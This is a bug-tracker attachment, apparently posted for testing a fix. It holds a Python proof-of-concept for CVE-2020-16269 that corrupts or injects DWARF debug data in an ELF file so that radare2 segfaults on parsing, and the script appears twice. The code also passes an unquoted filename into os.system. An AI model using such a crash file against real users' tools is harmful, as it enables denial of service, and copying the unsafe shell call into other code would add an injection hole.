Attachment 12537 Details for Bug 28476 – Test file for CVE-2020-16269

Test file for CVE-2020-16269

test_crash (text/x-python3), 2.69 KB, created by Len Lawrence on 2021-03-28 15:42:30 CEST

(hide)

Description:

Filename:

MIME Type:

Creator: Len Lawrence

Created: 2021-03-28 15:42:30 CEST

Size: 2.69 KB

patch

obsolete

>#!/usr/bin/python3
>from elftools.elf.elffile import ELFFile
>from elftools.elf.enums import ENUM_E_MACHINE
>import sys
>import struct
>import argparse
>import os
>import base64
>
># trigger a segfault in radare2 by modifing a DW_FORM_strp (a reference to a string in the dwarf debug format) (modify the shift in DW_AT_name)
># bug found by S01den and Architect (with custom fuzzing)
>
>def build_parser():
>	parser = argparse.ArgumentParser(description="Trigger a segfault in radare2 by modifing a DW_FORM_strp in .debug_info")
>	parser.add_argument("-f", "--file", 
>		type=str, default="main",
>		help="select the file to patch")
>
>	return parser
>
>print("__________                       _____  ________   _____  _________                      .__     ")
>print("\______   \_______  ____   _____/ ____\ \_____  \_/ ____\ \_   ___ \____________    _____|  |__  ")
>print("|     ___/\_  __ \/  _ \ /  _ \   __\   /   |   \   __\  /    \  \/\_  __ \__  \  /  ___/  |  \  ")
>print("|    |     |  | \(  <_> |  <_> )  |    /    |    \  |    \     \____|  | \// __ \_\___ \|   Y  \ ")
>print("|____|     |__|   \____/ \____/|__|    \_______  /__|     \______  /|__|  (____  /____  >___|  / ")
>print("                                                \/                \/            \/     \/     \/ ")
>
>args = build_parser().parse_args()
>
>if(len(sys.argv) < 2):
>	print("Command: ./unRadare2.py -f file_to_patch")
>	exit()
>
>filename = args.file
>found = 0
>
>file = open(filename,"rb")
>binary = bytearray(file.read())
>elffile = ELFFile(file)
>
>offset_section_table = elffile.header.e_shoff
>nbr_entries_section_table = elffile.header.e_shnum
>
>for section in elffile.iter_sections():
>	if(section.name == ".debug_info"):
>		print("[*] .debug_info section f0und at %s!" % hex(section['sh_offset']))
>		found = 1
>		break
>
>if(found):
>	offset_dbg = section['sh_offset']
>	binary[offset_dbg+0x31] = 0xff
>	new_filename = filename+"_PoC"
>	new_file = open(new_filename,"wb")
>	new_file.write(binary)
>	new_file.close()
>
>	print("[*] ELF patched ! ----> "+new_filename)
>
>else:
>	comment_section = 0
>	shstrtab_section = 0
>
>	print("[!] No .debug_info section f0und :(")
>	print("[*] So let's add it !")
>
>	bin_abbrev = base64.b64decode("AREBJQ4TCwMOGw4RARIHEBcAAAIWAAMOOgs7C0kTAAADJAALCz4LAw4AAAQkAAsLPgsDCAAABQ8ACwsAAAYPAA==")
>	bin_info = base64.b64decode("OAAAAAQAAAAAAAgBowAAAATXDQAAhxcAAM0OQAAAAAAAYCAAAAAAAAAAAAAAAjAAAAAD1DgAAAADCAcyFQAAAwEI")
>
>	open("tmp_info", "wb").write(bin_info)
>	open("tmp_abbrev", "wb").write(bin_abbrev)
>
>	cmd_1 = "objcopy --add-section .debug_info=tmp_info "+args.file
>	cmd_2 = "objcopy --add-section .debug_abbrev=tmp_abbrev "+args.file
>
>	os.system(cmd_1)
>	os.system(cmd_2)
>	os.remove("tmp_info")
>	os.remove("tmp_abbrev")
>	print("[*] ELF patched ! ----> "+filename)
>
>file.close()

#!/usr/bin/python3
from elftools.elf.elffile import ELFFile
from elftools.elf.enums import ENUM_E_MACHINE
import sys
import struct
import argparse
import os
import base64

# trigger a segfault in radare2 by modifing a DW_FORM_strp (a reference to a string in the dwarf debug format) (modify the shift in DW_AT_name)
# bug found by S01den and Architect (with custom fuzzing)

def build_parser():
	parser = argparse.ArgumentParser(description="Trigger a segfault in radare2 by modifing a DW_FORM_strp in .debug_info")
	parser.add_argument("-f", "--file", 
		type=str, default="main",
		help="select the file to patch")

	return parser

print("__________                       _____  ________   _____  _________                      .__     ")
print("\______   \_______  ____   _____/ ____\ \_____  \_/ ____\ \_   ___ \____________    _____|  |__  ")
print("|     ___/\_  __ \/  _ \ /  _ \   __\   /   |   \   __\  /    \  \/\_  __ \__  \  /  ___/  |  \  ")
print("|    |     |  | \(  <_> |  <_> )  |    /    |    \  |    \     \____|  | \// __ \_\___ \|   Y  \ ")
print("|____|     |__|   \____/ \____/|__|    \_______  /__|     \______  /|__|  (____  /____  >___|  / ")
print("                                                \/                \/            \/     \/     \/ ")

args = build_parser().parse_args()

if(len(sys.argv) < 2):
	print("Command: ./unRadare2.py -f file_to_patch")
	exit()

filename = args.file
found = 0

file = open(filename,"rb")
binary = bytearray(file.read())
elffile = ELFFile(file)

offset_section_table = elffile.header.e_shoff
nbr_entries_section_table = elffile.header.e_shnum

for section in elffile.iter_sections():
	if(section.name == ".debug_info"):
		print("[*] .debug_info section f0und at %s!" % hex(section['sh_offset']))
		found = 1
		break

if(found):
	offset_dbg = section['sh_offset']
	binary[offset_dbg+0x31] = 0xff
	new_filename = filename+"_PoC"
	new_file = open(new_filename,"wb")
	new_file.write(binary)
	new_file.close()

	print("[*] ELF patched ! ----> "+new_filename)

else:
	comment_section = 0
	shstrtab_section = 0

	print("[!] No .debug_info section f0und :(")
	print("[*] So let's add it !")

	bin_abbrev = base64.b64decode("AREBJQ4TCwMOGw4RARIHEBcAAAIWAAMOOgs7C0kTAAADJAALCz4LAw4AAAQkAAsLPgsDCAAABQ8ACwsAAAYPAA==")
	bin_info = base64.b64decode("OAAAAAQAAAAAAAgBowAAAATXDQAAhxcAAM0OQAAAAAAAYCAAAAAAAAAAAAAAAjAAAAAD1DgAAAADCAcyFQAAAwEI")

	open("tmp_info", "wb").write(bin_info)
	open("tmp_abbrev", "wb").write(bin_abbrev)

	cmd_1 = "objcopy --add-section .debug_info=tmp_info "+args.file
	cmd_2 = "objcopy --add-section .debug_abbrev=tmp_abbrev "+args.file

	os.system(cmd_1)
	os.system(cmd_2)
	os.remove("tmp_info")
	os.remove("tmp_abbrev")
	print("[*] ELF patched ! ----> "+filename)

file.close()

Actions: View

Attachments on bug 28476: 12537 | 12538